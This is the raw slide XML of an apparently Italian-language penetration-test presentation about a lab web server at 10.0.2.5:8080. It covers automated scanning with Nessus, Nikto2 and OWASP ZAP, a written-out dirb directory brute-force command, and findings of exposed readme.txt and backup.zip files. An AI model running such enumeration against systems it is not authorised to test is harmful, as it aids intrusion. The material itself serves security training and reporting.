            <a:ext cx="4418103" cy="887782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208698803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Vulnerability mapping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Analisi</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="all" spc="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automatiche</a:t>
            </a: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 per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="all" spc="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applicazioni</a:t>
            </a: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 web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C0000FE7-13DE-0410-C6B7-1F8E4D67463B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259305" y="1780932"/>
            <a:ext cx="9673389" cy="364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600" dirty="0"/>
              <a:t>I tool con cui sono state effettuate analisi automatiche per applicazioni web sono stati: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600" b="1" dirty="0" err="1"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>(Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>)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600" b="1" dirty="0"/>
              <a:t>Nikto2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600" b="1" dirty="0" err="1"/>
              <a:t>Owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0"/>
              <a:t> ZAP</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2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0CED0F44-C8C8-037C-14F5-33450FAB9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54" y="4302166"/>
            <a:ext cx="5955719" cy="1197950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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9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22D05477-9641-6482-4492-67A2A4E49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412" y="3175709"/>
            <a:ext cx="3623434" cy="857503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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Immagine 12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F165325B-EE44-190C-6744-382061E81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91" y="4178595"/>
            <a:ext cx="5189055" cy="2301422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54C2E0C-3901-1BDD-02E0-A58DE982E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54" y="5574984"/>
            <a:ext cx="5955719" cy="272671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CBEF1CA0-65FA-FE85-92F9-07050C7419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6" y="6244511"/>
            <a:ext cx="5955720" cy="231010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60BF272D-8173-BD41-4183-CF6BA41641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6" y="5928761"/>
            <a:ext cx="5955719" cy="231290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2173118753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Vulnerability mapping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Analisi</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="all" spc="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manuale</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" cap="all" spc="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+mj-cs"/>
            </a:endParaRP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C0000FE7-13DE-0410-C6B7-1F8E4D67463B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435768" y="1433593"/>
            <a:ext cx="9673389" cy="364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+mj-lt"/>
              </a:rPr>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> http://10.0.2.5:8080/ /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>wordlists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/big.txt -X .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>,.zip,.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>,.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>xmlq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5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5BB8C3F6-2BBE-87CE-3EA2-8295413D9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51" y="2044184"/>
            <a:ext cx="7676698" cy="4407397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2565842011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Vulnerability mapping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Analisi</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="all" spc="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manuale</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" cap="all" spc="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+mj-cs"/>
            </a:endParaRP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C0000FE7-13DE-0410-C6B7-1F8E4D67463B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1360707"/>
            <a:ext cx="12192000" cy="364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39700" indent="0" algn="ctr">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>DirBuster</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr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AF1864A-2203-71B5-C266-29C1764EE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8" y="2060944"/>
            <a:ext cx="5358669" cy="4469751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4CF8452-EB76-184C-ABA4-7B99D4515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1425"/>
            <a:ext cx="5849166" cy="4439270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403959288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Vulnerability mapping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Analisi</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="all" spc="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delle</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="all" spc="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informazioni</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="all" spc="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raccolte</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" cap="all" spc="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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1031919" y="1681399"/>
            <a:ext cx="9673389" cy="364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La versione del web server e affetta da molteplici vulnerabilità</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buNone/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Il web server consente l’accesso e la visualizzazione di file che non dovrebbero essere accessibili a tutti gli utenti, poiché non fanno parte dell’aspetto funzionale del sito web, ma sono spesso file di configurazione o simili che sono utili per il suo corretto funzionamento</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buNone/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Tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DirBuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> e Nikto2, abbiamo notato la presenza di un file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>readme.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>backup.zip</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene testo, Software multimediale, Carattere, software&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18546386-7107-3BD7-FCCB-3645BCAB0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93" y="4495563"/>
            <a:ext cx="9772650" cy="1362075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715485242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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614266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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="136095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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253" y="3859506"/>
            <a:ext cx="2611973" cy="230096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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="134817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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C4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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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3" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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 dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability</a:t>
            </a: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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege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Escalation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Mantaining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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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20339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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
